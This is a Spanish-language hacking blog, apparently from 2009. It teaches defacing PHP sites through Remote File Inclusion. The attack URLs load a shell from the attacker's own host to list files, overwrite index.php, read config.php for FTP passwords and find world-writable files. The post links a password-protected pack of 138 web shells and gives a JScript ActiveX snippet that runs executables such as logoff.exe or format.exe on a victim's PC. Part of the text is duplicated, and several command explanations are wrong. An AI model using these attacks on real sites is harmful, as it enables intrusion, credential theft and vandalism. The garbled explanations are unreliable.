Como ya Explique, Esta tecnica se basa en un bug de webs programadas en PHP.
Esta tecnica nos deja meter nuestra Shell para poder ejecutar comandos Linux/Unix.
Ahora Empezemos. Un Pequeño Ejemplo imaginemonos que nos encontramos esta Web:
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.Rario.com/index.php?seccion=Links
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
Lo Primero que tenemos que hacer es ver si podemos meterle nuestra Shell, Asi:
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.Rario.com/index.php?seccion=http://yo.tuhost.com/Rario/shell.gif?&cmd=ls
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
Dejenme Explicarles como Funciona:
www.Rario.com
Esta es la web Vulnerable
---
Index.php? Tambien conocido como Main. php?, Home.php? etc...
Esta es la Pagina Principal
---
seccion=
Variable en PHP para ir a alguna Seccion especial tambien puede cambiar
---
http://yo.tuhost.com/Rario/yo.gif
Url de Nuestra Shell, si no Tienes tu Host Abre uno (Yo recomiendo Miarroba)
Siempre ponle una extencion diferente, que no sea Php, Html etc... para mas
seguridad pone extencion Gif, Sh etc... Por que sino la estariamos corriendo
en Nuestra maquina.
---
?&cmd=
Esto le pondremos despues de nuestra URL con la shell para ejecutar un Comando.
---
LS
Este es el Comando de Linux a ejecutar,nos enlista los archivos del servidor
Al introducir nuestra shell con exito no debera salir una tabla con datos del Servidor.
Tambien te Dice si tienes permiso de Escritura si los tienes ya tienes tu deface.
Un deface simple es Ponerle un "Echo Hacked by Rario"
Si en la tabla de tu shell te aparece la pagina principal asi:
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www/home/rario
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
Solo tenemos que hacer esto:
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.Rario.com/index.php?seccion=http://yo.tuhost.com/Rario/shell.gif?&cmd=cd/www/home/Rario/;echo Hacked by Rario>index.php
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
Al introducir esta direccion esto es lo que Pasa:
CD
Nos lleva a alguna carpeta en esta caso www/home/rario
---
;Echo
este Comando muestra en la pantalla un texto en este caso Hacked by Rario
---
>
Este Comando inserta el comando anterior a algun archivo en este caso Index.php
Tambien se podria buscar el Archivo Config.php,Ahi se encuentra la contraseña del FTP
Para hacer esto tendriamos que introducir algo asi:
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.Rario.com/index.php?seccion=http://yo.tuhost.com/Rario/shell.gif?&cmd=cd/www/home/rario/;cat config.php
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
y nos Mostrara algo asi:
Host:RarioBlog
User:Rario
Password:Blog
Con esto puedes usar un cliente FTP y subir tu index mejorado.
Pero si no tuvieramos permiso de escritura,pasaremos a buscar archivos y carpetas que tengan permisos.
Para Buscar dichos archivos se introduciria algo asi:
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.rario.com/index.php?seccion=http://yo.tuhost.com/rario/shell.gif?&Cmd=cd/www/home/rario/;find -perm 777
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
Find
El comando Find pues tal como dice (en ingles) sirve para Buscar
---
-perm 777
Significa Permisos
En pocas palabras te enlistara todos los archivos con permiso para que los Defaces.
Por Ultimo, Si al meter tu shell te sale un error quiere decir que la web tiene bugs en su PHP, consiguete un RPVS para buscar vulnerabilidades en esa Web.
Si al introducir tu shell te lleva a la pagina principal es que esta bien actualizada asi que empieza a buscar otra web =D.
viernes, 4 de septiembre de 2009
Introduccion al RFI
Hola, Ahora les enseñare como Hacer un Deface por RFI, pero te preguntaras que es RFI No?...
Esta es la Respuesta:
RFI (Remote file Inclision)
Es una tecnica de defacing que explota un bug en webs programadas en php, el problema radica en
un include que esta mal puesto y nos deja meter nuestra shell para hacer nuestro RFI
Ok..., Pero que es una Shell?
Es un sencillo programa dedicado para ejecutar comandos mas rapido, sin necesitar alguna interfaze grafica....por ejemplo la shell de Windows seria CMD, Pero en este caso al ser PHP Necesitaremos una shell que ejecute comandos Linux/Unix
Esta Bien pero como consigo Una?
Pues se los Dejo Facil, Aqui hay 138 Shells a escoger =D
http://www.mediafire.com/?3zykklaw2yd
Pass: Rario
Ya tienes una Shell, Ya sabes que es un RFI pero como usas la Shell?
pues miren estos son los Comandos de Unix/Linux mas comunes y probablemente los unicos que vamos a usar
ls Nos enlista los archivos y carpetas del servidor web
cd Nos sirve para saltarnos a alguna carpeta
cat Nos muestra el codigo fuente del algun archivo
id Nos dice si tenemos permisos de escritura
mkdir Con este comando borramos algun archivo
wget Subimos un archvio
Esta es la Respuesta:
RFI (Remote file Inclision)
Es una tecnica de defacing que explota un bug en webs programadas en php, el problema radica en
un include que esta mal puesto y nos deja meter nuestra shell para hacer nuestro RFI
Ok..., Pero que es una Shell?
Es un sencillo programa dedicado para ejecutar comandos mas rapido, sin necesitar alguna interfaze grafica....por ejemplo la shell de Windows seria CMD, Pero en este caso al ser PHP Necesitaremos una shell que ejecute comandos Linux/Unix
Esta Bien pero como consigo Una?
Pues se los Dejo Facil, Aqui hay 138 Shells a escoger =D
http://www.mediafire.com/?3zykklaw2yd
Pass: Rario
Ya tienes una Shell, Ya sabes que es un RFI pero como usas la Shell?
pues miren estos son los Comandos de Unix/Linux mas comunes y probablemente los unicos que vamos a usar
ls Nos enlista los archivos y carpetas del servidor web
cd Nos sirve para saltarnos a alguna carpeta
cat Nos muestra el codigo fuente del algun archivo
id Nos dice si tenemos permisos de escritura
mkdir Con este comando borramos algun archivo
wget Subimos un archvio
Hacking con JScript II
<html>
<body>
<script language="javascript">
var shell = new ActiveXObject ("WScript.Shell");
shell.Run("C:\windows\system32\logoff.exe")
</script>
</body>
<center><code><h1>The Rario Blog</h1></code>
</html>Este es otro codigo en JScript,si tu victima lo acepta se ejecuta
C:\Windows\System32\logoff.exe
Con este simple codigo estamos cerrando la sesion del usuario.
porsupuesto pueden ejecutar cualquier archivo en la pc del usuario.
Unos ejemplos
C:\WINDOWS\system32\dfrg.exe ==> Sirve para desfragmentar el Disco Duro
C:\WINDOWS\system32\calc.exe ==> Abre la calculadora
C:\WINDOWS\system32\edit.exe => Muestra algunas librerias y las podemos editar
C:\WINDOWS\system32\format.exe => Formate Unidades de Disco
C:\WINDOWS\system32\mspaint.exe => Abre Paint
C:\WINDOWS\system32\notepad.exe => Abre Block de notas
C:\WINDOWS\system32\osk.exe ==> Muestra Teclado en pantalla
El programa que quieran abrir Siempre debe de estar dentro de la Variable shell.run C:\....
Suscribirse a:
Entradas (Atom)
